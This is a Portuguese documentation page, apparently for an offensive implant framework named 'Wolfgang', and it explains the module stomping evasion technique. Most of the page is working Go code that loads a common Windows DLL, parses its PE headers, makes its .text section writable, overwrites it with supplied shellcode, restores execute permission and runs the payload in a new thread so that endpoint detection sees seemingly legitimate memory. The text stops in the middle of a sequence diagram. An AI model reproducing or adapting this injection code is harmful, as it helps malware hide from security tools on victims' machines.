<span class="md-ellipsis">
    
  
    File Operations
  

    
  </span>
</a>
</li>
<li class="md-nav__item">
<a class="md-nav__link" href="../../../modules/recon/">
<span class="md-ellipsis">
    
  
    Reconnaissance
  

    
  </span>
</a>
</li>
<li class="md-nav__item">
<a class="md-nav__link" href="../../../modules/persist/">
<span class="md-ellipsis">
    
  
    Persistence
  

    
  </span>
</a>
</li>
<li class="md-nav__item">
<a class="md-nav__link" href="../../../modules/lateral/">
<span class="md-ellipsis">
    
  
    Lateral Movement
  

    
  </span>
</a>
</li>
<li class="md-nav__item">
<a class="md-nav__link" href="../../../modules/credential/">
<span class="md-ellipsis">
    
  
    Credentials
  

    
  </span>
</a>
</li>
<li class="md-nav__item">
<a class="md-nav__link" href="../../../modules/evasion/">
<span class="md-ellipsis">
    
  
    Evasion
  

    
  </span>
</a>
</li>
<li class="md-nav__item">
<a class="md-nav__link" href="../../../modules/exfil/">
<span class="md-ellipsis">
    
  
    Exfiltration
  

    
  </span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle md-toggle--indeterminate" id="__nav_8" type="checkbox"/>
<div class="md-nav__link md-nav__container">
<a class="md-nav__link" href="../../../api/">
<span class="md-ellipsis">
    
  
    API Reference
  

    
  </span>
</a>
</div>
<nav aria-expanded="false" aria-labelledby="__nav_8_label" class="md-nav" data-md-level="1">
<label class="md-nav__title" for="__nav_8">
<span class="md-nav__icon md-icon"></span>
            
  
    API Reference
  

          </label>
<ul class="md-nav__list" data-md-scrollfix="">
</ul>
</nav>
</li>
</ul>
</nav>
</div>
</div>
</div>
<div class="md-content" data-md-component="content">
<article class="md-content__inner md-typeset">
<h1 id="module-stomping">Module Stomping<a class="headerlink" href="#module-stomping" title="Permanent link">¶</a></h1>
<h2 id="o-que-e">O que é<a class="headerlink" href="#o-que-e" title="Permanent link">¶</a></h2>
<p>Module stomping é uma técnica de injeção que carrega uma DLL legítima no processo
e sobrescreve sua seção <code>.text</code> (código executável) com o payload. O payload
então executa a partir de uma região de memória que está <strong>disk-backed</strong> -- ou
seja, o sistema operacional acredita que a memória pertence à DLL legítima.</p>
<p>Isso evita detecção por heurísticas de "unbacked memory execution", que procuram
código executável em regiões que não correspondem a nenhum arquivo em disco.</p>
<h2 id="por-que-funciona">Por que funciona<a class="headerlink" href="#por-que-funciona" title="Permanent link">¶</a></h2>
<h3 id="memory-backed-vs-unbacked">Memory-Backed vs Unbacked<a class="headerlink" href="#memory-backed-vs-unbacked" title="Permanent link">¶</a></h3>
<p>Quando o Windows carrega uma DLL via <code>LoadLibrary</code>, mapeia seções do arquivo em
disco para a memória. O kernel mantém um registro de que aquela região de memória
corresponde a um arquivo específico. Ferramentas de análise como Process Hacker
e EDRs usam essa informação:</p>
<div class="highlight"><pre><span></span><code><a href="#__codelineno-0-1" id="__codelineno-0-1" name="__codelineno-0-1"></a>Região com backing:     kernel32.dll → .text → READ_EXECUTE  ✓ Normal
<a href="#__codelineno-0-2" id="__codelineno-0-2" name="__codelineno-0-2"></a>Região sem backing:     ??? → RWX → (shellcode)               ✗ Suspeita
<a href="#__codelineno-0-3" id="__codelineno-0-3" name="__codelineno-0-3"></a>Região stomped:         mshtml.dll → .text → READ_EXECUTE     ✓ Parece normal
</code></pre></div>
<p>Mesmo que os bytes na seção <code>.text</code> tenham sido substituídos, o kernel ainda
associa a região à DLL original. A detecção requer comparar os bytes em
memória com os bytes no arquivo em disco -- uma operação cara que nem todos
os EDRs fazem continuamente.</p>
<h3 id="selecao-da-dll-alvo">Seleção da DLL alvo<a class="headerlink" href="#selecao-da-dll-alvo" title="Permanent link">¶</a></h3>
<p>O Wolfgang usa DLLs que:</p>
<ul>
<li>São grandes (seção <code>.text</code> suficiente para o payload)</li>
<li>São comuns no Windows (presença não é suspeita)</li>
<li>Não são críticas para o funcionamento do processo</li>
</ul>
<div class="highlight"><pre><span></span><code><a href="#__codelineno-1-1" id="__codelineno-1-1" name="__codelineno-1-1"></a><span class="kd">var</span><span class="w"> </span><span class="nx">defaultStompTargets</span><span class="w"> </span><span class="p">=</span><span class="w"> </span><span class="p">[]</span><span class="kt">string</span><span class="p">{</span>
<a href="#__codelineno-1-2" id="__codelineno-1-2" name="__codelineno-1-2"></a><span class="w">    </span><span class="s">"mshtml.dll"</span><span class="p">,</span><span class="w">   </span><span class="c1">// Internet Explorer rendering engine</span>
<a href="#__codelineno-1-3" id="__codelineno-1-3" name="__codelineno-1-3"></a><span class="w">    </span><span class="s">"mfc42u.dll"</span><span class="p">,</span><span class="w">   </span><span class="c1">// MFC Unicode runtime</span>
<a href="#__codelineno-1-4" id="__codelineno-1-4" name="__codelineno-1-4"></a><span class="w">    </span><span class="s">"ieframe.dll"</span><span class="p">,</span><span class="w">  </span><span class="c1">// IE frame library</span>
<a href="#__codelineno-1-5" id="__codelineno-1-5" name="__codelineno-1-5"></a><span class="w">    </span><span class="s">"dbghelp.dll"</span><span class="p">,</span><span class="w">  </span><span class="c1">// Debug helper library</span>
<a href="#__codelineno-1-6" id="__codelineno-1-6" name="__codelineno-1-6"></a><span class="w">    </span><span class="s">"combase.dll"</span><span class="p">,</span><span class="w">  </span><span class="c1">// COM base library</span>
<a href="#__codelineno-1-7" id="__codelineno-1-7" name="__codelineno-1-7"></a><span class="p">}</span>
</code></pre></div>
<h2 id="implementacao-no-wolfgang">Implementação no Wolfgang<a class="headerlink" href="#implementacao-no-wolfgang" title="Permanent link">¶</a></h2>
<h3 id="interface-do-modulo">Interface do módulo<a class="headerlink" href="#interface-do-modulo" title="Permanent link">¶</a></h3>
<div class="highlight"><pre><span></span><code><a href="#__codelineno-2-1" id="__codelineno-2-1" name="__codelineno-2-1"></a><span class="kd">type</span><span class="w"> </span><span class="nx">ModuleStomp</span><span class="w"> </span><span class="kd">struct</span><span class="w"> </span><span class="p">{</span>
<a href="#__codelineno-2-2" id="__codelineno-2-2" name="__codelineno-2-2"></a><span class="w">    </span><span class="nx">stompFunc</span><span class="w"> </span><span class="kd">func</span><span class="p">(</span><span class="nx">payload</span><span class="w"> </span><span class="p">[]</span><span class="kt">byte</span><span class="p">,</span><span class="w"> </span><span class="nx">targetDLL</span><span class="w"> </span><span class="kt">string</span><span class="p">)</span><span class="w"> </span><span class="kt">error</span>
<a href="#__codelineno-2-3" id="__codelineno-2-3" name="__codelineno-2-3"></a><span class="p">}</span>
<a href="#__codelineno-2-4" id="__codelineno-2-4" name="__codelineno-2-4"></a>
<a href="#__codelineno-2-5" id="__codelineno-2-5" name="__codelineno-2-5"></a><span class="kd">func</span><span class="w"> </span><span class="p">(</span><span class="nx">m</span><span class="w"> </span><span class="o">*</span><span class="nx">ModuleStomp</span><span class="p">)</span><span class="w"> </span><span class="nx">Execute</span><span class="p">(</span><span class="nx">ctx</span><span class="w"> </span><span class="nx">context</span><span class="p">.</span><span class="nx">Context</span><span class="p">,</span><span class="w"> </span><span class="nx">args</span><span class="w"> </span><span class="nx">module</span><span class="p">.</span><span class="nx">ModuleArgs</span><span class="p">)</span><span class="w"> </span><span class="p">(</span><span class="nx">module</span><span class="p">.</span><span class="nx">ModuleResult</span><span class="p">,</span><span class="w"> </span><span class="kt">error</span><span class="p">)</span><span class="w"> </span><span class="p">{</span>
<a href="#__codelineno-2-6" id="__codelineno-2-6" name="__codelineno-2-6"></a><span class="w">    </span><span class="nx">args</span><span class="p">.</span><span class="nx">ParseRaw</span><span class="p">()</span>
<a href="#__codelineno-2-7" id="__codelineno-2-7" name="__codelineno-2-7"></a><span class="w">    </span><span class="nx">shellcodeHex</span><span class="w"> </span><span class="o">:=</span><span class="w"> </span><span class="nx">args</span><span class="p">.</span><span class="nx">Parsed</span><span class="p">[</span><span class="s">"shellcode"</span><span class="p">]</span>
<a href="#__codelineno-2-8" id="__codelineno-2-8" name="__codelineno-2-8"></a><span class="w">    </span><span class="nx">targetDLL</span><span class="w"> </span><span class="o">:=</span><span class="w"> </span><span class="nx">args</span><span class="p">.</span><span class="nx">Parsed</span><span class="p">[</span><span class="s">"target_dll"</span><span class="p">]</span>
<a href="#__codelineno-2-9" id="__codelineno-2-9" name="__codelineno-2-9"></a>
<a href="#__codelineno-2-10" id="__codelineno-2-10" name="__codelineno-2-10"></a><span class="w">    </span><span class="nx">shellcode</span><span class="p">,</span><span class="w"> </span><span class="nx">_</span><span class="w"> </span><span class="o">:=</span><span class="w"> </span><span class="nx">hex</span><span class="p">.</span><span class="nx">DecodeString</span><span class="p">(</span><span class="nx">shellcodeHex</span><span class="p">)</span>
<a href="#__codelineno-2-11" id="__codelineno-2-11" name="__codelineno-2-11"></a><span class="w">    </span><span class="nx">StompExecute</span><span class="p">(</span><span class="nx">shellcode</span><span class="p">,</span><span class="w"> </span><span class="nx">targetDLL</span><span class="p">)</span>
<a href="#__codelineno-2-12" id="__codelineno-2-12" name="__codelineno-2-12"></a>
<a href="#__codelineno-2-13" id="__codelineno-2-13" name="__codelineno-2-13"></a><span class="w">    </span><span class="k">return</span><span class="w"> </span><span class="nx">module</span><span class="p">.</span><span class="nx">ModuleResult</span><span class="p">{</span>
<a href="#__codelineno-2-14" id="__codelineno-2-14" name="__codelineno-2-14"></a><span class="w">        </span><span class="nx">Output</span><span class="p">:</span><span class="w"> </span><span class="nx">fmt</span><span class="p">.</span><span class="nx">Sprintf</span><span class="p">(</span><span class="s">"payload executed via module stomping (%d bytes)"</span><span class="p">,</span><span class="w"> </span><span class="nb">len</span><span class="p">(</span><span class="nx">shellcode</span><span class="p">)),</span>
<a href="#__codelineno-2-15" id="__codelineno-2-15" name="__codelineno-2-15"></a><span class="w">    </span><span class="p">},</span><span class="w"> </span><span class="kc">nil</span>
<a href="#__codelineno-2-16" id="__codelineno-2-16" name="__codelineno-2-16"></a><span class="p">}</span>
</code></pre></div>
<h3 id="carregamento-e-parse-da-dll">Carregamento e parse da DLL<a class="headerlink" href="#carregamento-e-parse-da-dll" title="Permanent link">¶</a></h3>
<div class="highlight"><pre><span></span><code><a href="#__codelineno-3-1" id="__codelineno-3-1" name="__codelineno-3-1"></a><span class="kd">func</span><span class="w"> </span><span class="nx">loadStompTarget</span><span class="p">(</span><span class="nx">preferred</span><span class="w"> </span><span class="kt">string</span><span class="p">)</span><span class="w"> </span><span class="p">(</span><span class="o">*</span><span class="nx">stompTarget</span><span class="p">,</span><span class="w"> </span><span class="kt">error</span><span class="p">)</span><span class="w"> </span><span class="p">{</span>
<a href="#__codelineno-3-2" id="__codelineno-3-2" name="__codelineno-3-2"></a><span class="w">    </span><span class="nx">targets</span><span class="w"> </span><span class="o">:=</span><span class="w"> </span><span class="nx">defaultStompTargets</span>
<a href="#__codelineno-3-3" id="__codelineno-3-3" name="__codelineno-3-3"></a><span class="w">    </span><span class="k">if</span><span class="w"> </span><span class="nx">preferred</span><span class="w"> </span><span class="o">!=</span><span class="w"> </span><span class="s">""</span><span class="w"> </span><span class="p">{</span>
<a href="#__codelineno-3-4" id="__codelineno-3-4" name="__codelineno-3-4"></a><span class="w">        </span><span class="nx">targets</span><span class="w"> </span><span class="p">=</span><span class="w"> </span><span class="p">[]</span><span class="kt">string</span><span class="p">{</span><span class="nx">preferred</span><span class="p">}</span>
<a href="#__codelineno-3-5" id="__codelineno-3-5" name="__codelineno-3-5"></a><span class="w">    </span><span class="p">}</span>
<a href="#__codelineno-3-6" id="__codelineno-3-6" name="__codelineno-3-6"></a>
<a href="#__codelineno-3-7" id="__codelineno-3-7" name="__codelineno-3-7"></a><span class="w">    </span><span class="k">for</span><span class="w"> </span><span class="nx">_</span><span class="p">,</span><span class="w"> </span><span class="nx">dll</span><span class="w"> </span><span class="o">:=</span><span class="w"> </span><span class="k">range</span><span class="w"> </span><span class="nx">targets</span><span class="w"> </span><span class="p">{</span>
<a href="#__codelineno-3-8" id="__codelineno-3-8" name="__codelineno-3-8"></a><span class="w">        </span><span class="c1">// 1. Carrega a DLL legitimamente via Windows Loader</span>
<a href="#__codelineno-3-9" id="__codelineno-3-9" name="__codelineno-3-9"></a><span class="w">        </span><span class="nx">handle</span><span class="p">,</span><span class="w"> </span><span class="nx">err</span><span class="w"> </span><span class="o">:=</span><span class="w"> </span><span class="nx">windows</span><span class="p">.</span><span class="nx">LoadDLL</span><span class="p">(</span><span class="nx">dll</span><span class="p">)</span>
<a href="#__codelineno-3-10" id="__codelineno-3-10" name="__codelineno-3-10"></a><span class="w">        </span><span class="k">if</span><span class="w"> </span><span class="nx">err</span><span class="w"> </span><span class="o">!=</span><span class="w"> </span><span class="kc">nil</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="k">continue</span><span class="w"> </span><span class="p">}</span>
<a href="#__codelineno-3-11" id="__codelineno-3-11" name="__codelineno-3-11"></a>
<a href="#__codelineno-3-12" id="__codelineno-3-12" name="__codelineno-3-12"></a><span class="w">        </span><span class="nx">base</span><span class="w"> </span><span class="o">:=</span><span class="w"> </span><span class="nb">uintptr</span><span class="p">(</span><span class="nx">handle</span><span class="p">.</span><span class="nx">Handle</span><span class="p">)</span>
<a href="#__codelineno-3-13" id="__codelineno-3-13" name="__codelineno-3-13"></a>
<a href="#__codelineno-3-14" id="__codelineno-3-14" name="__codelineno-3-14"></a><span class="w">        </span><span class="c1">// 2. Parse do PE para encontrar .text section</span>
<a href="#__codelineno-3-15" id="__codelineno-3-15" name="__codelineno-3-15"></a><span class="w">        </span><span class="nx">dosHeader</span><span class="w"> </span><span class="o">:=</span><span class="w"> </span><span class="nx">unsafe</span><span class="p">.</span><span class="nx">Slice</span><span class="p">((</span><span class="o">*</span><span class="kt">byte</span><span class="p">)(</span><span class="nx">unsafe</span><span class="p">.</span><span class="nx">Pointer</span><span class="p">(</span><span class="nx">base</span><span class="p">)),</span><span class="w"> </span><span class="mi">64</span><span class="p">)</span>
<a href="#__codelineno-3-16" id="__codelineno-3-16" name="__codelineno-3-16"></a><span class="w">        </span><span class="nx">peOffset</span><span class="w"> </span><span class="o">:=</span><span class="w"> </span><span class="o">*</span><span class="p">(</span><span class="o">*</span><span class="kt">uint32</span><span class="p">)(</span><span class="nx">unsafe</span><span class="p">.</span><span class="nx">Pointer</span><span class="p">(</span><span class="o">&amp;</span><span class="nx">dosHeader</span><span class="p">[</span><span class="mh">0x3C</span><span class="p">]))</span>
<a href="#__codelineno-3-17" id="__codelineno-3-17" name="__codelineno-3-17"></a><span class="w">        </span><span class="nx">headerBytes</span><span class="w"> </span><span class="o">:=</span><span class="w"> </span><span class="nx">unsafe</span><span class="p">.</span><span class="nx">Slice</span><span class="p">((</span><span class="o">*</span><span class="kt">byte</span><span class="p">)(</span><span class="nx">unsafe</span><span class="p">.</span><span class="nx">Pointer</span><span class="p">(</span><span class="nx">base</span><span class="p">)),</span><span class="w"> </span><span class="nx">sizeOfHeaders</span><span class="p">)</span>
<a href="#__codelineno-3-18" id="__codelineno-3-18" name="__codelineno-3-18"></a><span class="w">        </span><span class="nx">pe</span><span class="p">,</span><span class="w"> </span><span class="nx">err</span><span class="w"> </span><span class="o">:=</span><span class="w"> </span><span class="nx">peparser</span><span class="p">.</span><span class="nx">Parse</span><span class="p">(</span><span class="nx">headerBytes</span><span class="p">)</span>
<a href="#__codelineno-3-19" id="__codelineno-3-19" name="__codelineno-3-19"></a><span class="w">        </span><span class="k">if</span><span class="w"> </span><span class="nx">err</span><span class="w"> </span><span class="o">!=</span><span class="w"> </span><span class="kc">nil</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="nx">handle</span><span class="p">.</span><span class="nx">Release</span><span class="p">();</span><span class="w"> </span><span class="k">continue</span><span class="w"> </span><span class="p">}</span>
<a href="#__codelineno-3-20" id="__codelineno-3-20" name="__codelineno-3-20"></a>
<a href="#__codelineno-3-21" id="__codelineno-3-21" name="__codelineno-3-21"></a><span class="w">        </span><span class="c1">// 3. Verifica que .text é grande o suficiente</span>
<a href="#__codelineno-3-22" id="__codelineno-3-22" name="__codelineno-3-22"></a><span class="w">        </span><span class="nx">text</span><span class="w"> </span><span class="o">:=</span><span class="w"> </span><span class="nx">pe</span><span class="p">.</span><span class="nx">GetSectionByName</span><span class="p">(</span><span class="s">".text"</span><span class="p">)</span>
<a href="#__codelineno-3-23" id="__codelineno-3-23" name="__codelineno-3-23"></a><span class="w">        </span><span class="k">if</span><span class="w"> </span><span class="nx">text</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="kc">nil</span><span class="w"> </span><span class="o">||</span><span class="w"> </span><span class="nx">text</span><span class="p">.</span><span class="nx">VirtualSize</span><span class="w"> </span><span class="p">&lt;</span><span class="w"> </span><span class="mi">4096</span><span class="w"> </span><span class="p">{</span>
<a href="#__codelineno-3-24" id="__codelineno-3-24" name="__codelineno-3-24"></a><span class="w">            </span><span class="nx">handle</span><span class="p">.</span><span class="nx">Release</span><span class="p">()</span>
<a href="#__codelineno-3-25" id="__codelineno-3-25" name="__codelineno-3-25"></a><span class="w">            </span><span class="k">continue</span>
<a href="#__codelineno-3-26" id="__codelineno-3-26" name="__codelineno-3-26"></a><span class="w">        </span><span class="p">}</span>
<a href="#__codelineno-3-27" id="__codelineno-3-27" name="__codelineno-3-27"></a>
<a href="#__codelineno-3-28" id="__codelineno-3-28" name="__codelineno-3-28"></a><span class="w">        </span><span class="k">return</span><span class="w"> </span><span class="o">&amp;</span><span class="nx">stompTarget</span><span class="p">{</span><span class="nx">handle</span><span class="p">:</span><span class="w"> </span><span class="nx">handle</span><span class="p">,</span><span class="w"> </span><span class="nx">base</span><span class="p">:</span><span class="w"> </span><span class="nx">base</span><span class="p">,</span><span class="w"> </span><span class="nx">section</span><span class="p">:</span><span class="w"> </span><span class="nx">text</span><span class="p">},</span><span class="w"> </span><span class="kc">nil</span>
<a href="#__codelineno-3-29" id="__codelineno-3-29" name="__codelineno-3-29"></a><span class="w">    </span><span class="p">}</span>
<a href="#__codelineno-3-30" id="__codelineno-3-30" name="__codelineno-3-30"></a><span class="w">    </span><span class="k">return</span><span class="w"> </span><span class="kc">nil</span><span class="p">,</span><span class="w"> </span><span class="nx">fmt</span><span class="p">.</span><span class="nx">Errorf</span><span class="p">(</span><span class="s">"no suitable stomp target found"</span><span class="p">)</span>
<a href="#__codelineno-3-31" id="__codelineno-3-31" name="__codelineno-3-31"></a><span class="p">}</span>
</code></pre></div>
<h3 id="stomping-e-execucao">Stomping e execução<a class="headerlink" href="#stomping-e-execucao" title="Permanent link">¶</a></h3>
<div class="highlight"><pre><span></span><code><a href="#__codelineno-4-1" id="__codelineno-4-1" name="__codelineno-4-1"></a><span class="kd">func</span><span class="w"> </span><span class="nx">StompExecute</span><span class="p">(</span><span class="nx">payload</span><span class="w"> </span><span class="p">[]</span><span class="kt">byte</span><span class="p">,</span><span class="w"> </span><span class="nx">targetDLL</span><span class="w"> </span><span class="kt">string</span><span class="p">)</span><span class="w"> </span><span class="kt">error</span><span class="w"> </span><span class="p">{</span>
<a href="#__codelineno-4-2" id="__codelineno-4-2" name="__codelineno-4-2"></a><span class="w">    </span><span class="c1">// 1. Carrega DLL alvo e localiza .text</span>
<a href="#__codelineno-4-3" id="__codelineno-4-3" name="__codelineno-4-3"></a><span class="w">    </span><span class="nx">target</span><span class="p">,</span><span class="w"> </span><span class="nx">_</span><span class="w"> </span><span class="o">:=</span><span class="w"> </span><span class="nx">loadStompTarget</span><span class="p">(</span><span class="nx">targetDLL</span><span class="p">)</span>
<a href="#__codelineno-4-4" id="__codelineno-4-4" name="__codelineno-4-4"></a><span class="w">    </span><span class="k">defer</span><span class="w"> </span><span class="nx">target</span><span class="p">.</span><span class="nx">cleanup</span><span class="p">()</span>
<a href="#__codelineno-4-5" id="__codelineno-4-5" name="__codelineno-4-5"></a>
<a href="#__codelineno-4-6" id="__codelineno-4-6" name="__codelineno-4-6"></a><span class="w">    </span><span class="nx">textSection</span><span class="w"> </span><span class="o">:=</span><span class="w"> </span><span class="nx">target</span><span class="p">.</span><span class="nx">section</span>
<a href="#__codelineno-4-7" id="__codelineno-4-7" name="__codelineno-4-7"></a>
<a href="#__codelineno-4-8" id="__codelineno-4-8" name="__codelineno-4-8"></a><span class="w">    </span><span class="c1">// 2. Verifica que o payload cabe na seção</span>
<a href="#__codelineno-4-9" id="__codelineno-4-9" name="__codelineno-4-9"></a><span class="w">    </span><span class="k">if</span><span class="w"> </span><span class="nb">uint32</span><span class="p">(</span><span class="nb">len</span><span class="p">(</span><span class="nx">payload</span><span class="p">))</span><span class="w"> </span><span class="p">&gt;</span><span class="w"> </span><span class="nx">textSection</span><span class="p">.</span><span class="nx">VirtualSize</span><span class="w"> </span><span class="p">{</span>
<a href="#__codelineno-4-10" id="__codelineno-4-10" name="__codelineno-4-10"></a><span class="w">        </span><span class="k">return</span><span class="w"> </span><span class="nx">fmt</span><span class="p">.</span><span class="nx">Errorf</span><span class="p">(</span><span class="s">"payload (%d) exceeds .text section (%d)"</span><span class="p">,</span>
<a href="#__codelineno-4-11" id="__codelineno-4-11" name="__codelineno-4-11"></a><span class="w">            </span><span class="nb">len</span><span class="p">(</span><span class="nx">payload</span><span class="p">),</span><span class="w"> </span><span class="nx">textSection</span><span class="p">.</span><span class="nx">VirtualSize</span><span class="p">)</span>
<a href="#__codelineno-4-12" id="__codelineno-4-12" name="__codelineno-4-12"></a><span class="w">    </span><span class="p">}</span>
<a href="#__codelineno-4-13" id="__codelineno-4-13" name="__codelineno-4-13"></a>
<a href="#__codelineno-4-14" id="__codelineno-4-14" name="__codelineno-4-14"></a><span class="w">    </span><span class="nx">textAddr</span><span class="w"> </span><span class="o">:=</span><span class="w"> </span><span class="nx">target</span><span class="p">.</span><span class="nx">base</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="nb">uintptr</span><span class="p">(</span><span class="nx">textSection</span><span class="p">.</span><span class="nx">VirtualAddress</span><span class="p">)</span>
<a href="#__codelineno-4-15" id="__codelineno-4-15" name="__codelineno-4-15"></a>
<a href="#__codelineno-4-16" id="__codelineno-4-16" name="__codelineno-4-16"></a><span class="w">    </span><span class="c1">// 3. Torna a seção gravável</span>
<a href="#__codelineno-4-17" id="__codelineno-4-17" name="__codelineno-4-17"></a><span class="w">    </span><span class="nx">oldProt</span><span class="p">,</span><span class="w"> </span><span class="nx">_</span><span class="w"> </span><span class="o">:=</span><span class="w"> </span><span class="nx">winapi</span><span class="p">.</span><span class="nx">VirtualProtect</span><span class="p">(</span><span class="nx">textAddr</span><span class="p">,</span>
<a href="#__codelineno-4-18" id="__codelineno-4-18" name="__codelineno-4-18"></a><span class="w">        </span><span class="nb">uintptr</span><span class="p">(</span><span class="nx">textSection</span><span class="p">.</span><span class="nx">VirtualSize</span><span class="p">),</span><span class="w"> </span><span class="nx">winapi</span><span class="p">.</span><span class="nx">PageReadWrite</span><span class="p">)</span>
<a href="#__codelineno-4-19" id="__codelineno-4-19" name="__codelineno-4-19"></a>
<a href="#__codelineno-4-20" id="__codelineno-4-20" name="__codelineno-4-20"></a><span class="w">    </span><span class="c1">// 4. Sobrescreve .text com o payload</span>
<a href="#__codelineno-4-21" id="__codelineno-4-21" name="__codelineno-4-21"></a><span class="w">    </span><span class="nx">dst</span><span class="w"> </span><span class="o">:=</span><span class="w"> </span><span class="nx">unsafe</span><span class="p">.</span><span class="nx">Slice</span><span class="p">((</span><span class="o">*</span><span class="kt">byte</span><span class="p">)(</span><span class="nx">unsafe</span><span class="p">.</span><span class="nx">Pointer</span><span class="p">(</span><span class="nx">textAddr</span><span class="p">)),</span><span class="w"> </span><span class="nx">textSection</span><span class="p">.</span><span class="nx">VirtualSize</span><span class="p">)</span>
<a href="#__codelineno-4-22" id="__codelineno-4-22" name="__codelineno-4-22"></a><span class="w">    </span><span class="nb">copy</span><span class="p">(</span><span class="nx">dst</span><span class="p">,</span><span class="w"> </span><span class="nx">payload</span><span class="p">)</span>
<a href="#__codelineno-4-23" id="__codelineno-4-23" name="__codelineno-4-23"></a>
<a href="#__codelineno-4-24" id="__codelineno-4-24" name="__codelineno-4-24"></a><span class="w">    </span><span class="c1">// 5. Zera o restante da seção (evita resíduos da DLL original)</span>
<a href="#__codelineno-4-25" id="__codelineno-4-25" name="__codelineno-4-25"></a><span class="w">    </span><span class="k">for</span><span class="w"> </span><span class="nx">i</span><span class="w"> </span><span class="o">:=</span><span class="w"> </span><span class="nb">len</span><span class="p">(</span><span class="nx">payload</span><span class="p">);</span><span class="w"> </span><span class="nx">i</span><span class="w"> </span><span class="p">&lt;</span><span class="w"> </span><span class="nb">int</span><span class="p">(</span><span class="nx">textSection</span><span class="p">.</span><span class="nx">VirtualSize</span><span class="p">);</span><span class="w"> </span><span class="nx">i</span><span class="o">++</span><span class="w"> </span><span class="p">{</span>
<a href="#__codelineno-4-26" id="__codelineno-4-26" name="__codelineno-4-26"></a><span class="w">        </span><span class="nx">dst</span><span class="p">[</span><span class="nx">i</span><span class="p">]</span><span class="w"> </span><span class="p">=</span><span class="w"> </span><span class="mi">0</span>
<a href="#__codelineno-4-27" id="__codelineno-4-27" name="__codelineno-4-27"></a><span class="w">    </span><span class="p">}</span>
<a href="#__codelineno-4-28" id="__codelineno-4-28" name="__codelineno-4-28"></a>
<a href="#__codelineno-4-29" id="__codelineno-4-29" name="__codelineno-4-29"></a><span class="w">    </span><span class="c1">// 6. Restaura permissão como READ_EXECUTE</span>
<a href="#__codelineno-4-30" id="__codelineno-4-30" name="__codelineno-4-30"></a><span class="w">    </span><span class="nx">winapi</span><span class="p">.</span><span class="nx">VirtualProtect</span><span class="p">(</span><span class="nx">textAddr</span><span class="p">,</span>
<a href="#__codelineno-4-31" id="__codelineno-4-31" name="__codelineno-4-31"></a><span class="w">        </span><span class="nb">uintptr</span><span class="p">(</span><span class="nx">textSection</span><span class="p">.</span><span class="nx">VirtualSize</span><span class="p">),</span><span class="w"> </span><span class="nx">winapi</span><span class="p">.</span><span class="nx">PageExecuteRead</span><span class="p">)</span>
<a href="#__codelineno-4-32" id="__codelineno-4-32" name="__codelineno-4-32"></a><span class="w">    </span><span class="nx">_</span><span class="w"> </span><span class="p">=</span><span class="w"> </span><span class="nx">oldProt</span>
<a href="#__codelineno-4-33" id="__codelineno-4-33" name="__codelineno-4-33"></a>
<a href="#__codelineno-4-34" id="__codelineno-4-34" name="__codelineno-4-34"></a><span class="w">    </span><span class="c1">// 7. Cria thread para executar o payload</span>
<a href="#__codelineno-4-35" id="__codelineno-4-35" name="__codelineno-4-35"></a><span class="w">    </span><span class="kd">var</span><span class="w"> </span><span class="nx">threadID</span><span class="w"> </span><span class="kt">uint32</span>
<a href="#__codelineno-4-36" id="__codelineno-4-36" name="__codelineno-4-36"></a><span class="w">    </span><span class="nx">r</span><span class="p">,</span><span class="w"> </span><span class="nx">_</span><span class="p">,</span><span class="w"> </span><span class="nx">_</span><span class="w"> </span><span class="o">:=</span><span class="w"> </span><span class="nx">procCreateThread</span><span class="p">.</span><span class="nx">Call</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span><span class="w"> </span><span class="mi">0</span><span class="p">,</span>
<a href="#__codelineno-4-37" id="__codelineno-4-37" name="__codelineno-4-37"></a><span class="w">        </span><span class="nx">textAddr</span><span class="p">,</span><span class="w"> </span><span class="mi">0</span><span class="p">,</span><span class="w"> </span><span class="mi">0</span><span class="p">,</span><span class="w"> </span><span class="nb">uintptr</span><span class="p">(</span><span class="nx">unsafe</span><span class="p">.</span><span class="nx">Pointer</span><span class="p">(</span><span class="o">&amp;</span><span class="nx">threadID</span><span class="p">)))</span>
<a href="#__codelineno-4-38" id="__codelineno-4-38" name="__codelineno-4-38"></a><span class="w">    </span><span class="nx">hThread</span><span class="w"> </span><span class="o">:=</span><span class="w"> </span><span class="nx">windows</span><span class="p">.</span><span class="nx">Handle</span><span class="p">(</span><span class="nx">r</span><span class="p">)</span>
<a href="#__codelineno-4-39" id="__codelineno-4-39" name="__codelineno-4-39"></a><span class="w">    </span><span class="k">defer</span><span class="w"> </span><span class="nx">windows</span><span class="p">.</span><span class="nx">CloseHandle</span><span class="p">(</span><span class="nx">hThread</span><span class="p">)</span>
<a href="#__codelineno-4-40" id="__codelineno-4-40" name="__codelineno-4-40"></a>
<a href="#__codelineno-4-41" id="__codelineno-4-41" name="__codelineno-4-41"></a><span class="w">    </span><span class="c1">// 8. Aguarda conclusão</span>
<a href="#__codelineno-4-42" id="__codelineno-4-42" name="__codelineno-4-42"></a><span class="w">    </span><span class="nx">windows</span><span class="p">.</span><span class="nx">WaitForSingleObject</span><span class="p">(</span><span class="nx">hThread</span><span class="p">,</span><span class="w"> </span><span class="nx">windows</span><span class="p">.</span><span class="nx">INFINITE</span><span class="p">)</span>
<a href="#__codelineno-4-43" id="__codelineno-4-43" name="__codelineno-4-43"></a><span class="w">    </span><span class="k">return</span><span class="w"> </span><span class="kc">nil</span>
<a href="#__codelineno-4-44" id="__codelineno-4-44" name="__codelineno-4-44"></a><span class="p">}</span>
</code></pre></div>
<h2 id="fluxo-de-execucao">Fluxo de Execução<a class="headerlink" href="#fluxo-de-execucao" title="Permanent link">¶</a></h2>
<pre class="mermaid"><code>sequenceDiagram
    participant IMP as Implant
    participant OS as Windows Loader
    participant DLL as mshtml.dll
    participant MEM as Memoria (.text)

    IMP-&gt;&gt;OS: LoadDLL("mshtml.dll")
    OS-&gt;&gt;DLL: MapViewOfFile
    OS--&gt;&gt;IMP: Handle + Base Address

    IMP-&gt;&gt;IMP: Parse PE headers
    IMP-&gt;&gt;IMP: Localiza .text section

    IMP-&gt;&gt;OS: VirtualProtect(.text, PAGE_READWRITE)
    Note over MEM: .text agora gravavel

    IMP-&gt;&gt;MEM: copy(payload) sobre .text
    IMP-&gt;&gt;MEM: Zero bytes restantes
    Note over MEM: Conteudo original<br/>substituido pelo payload

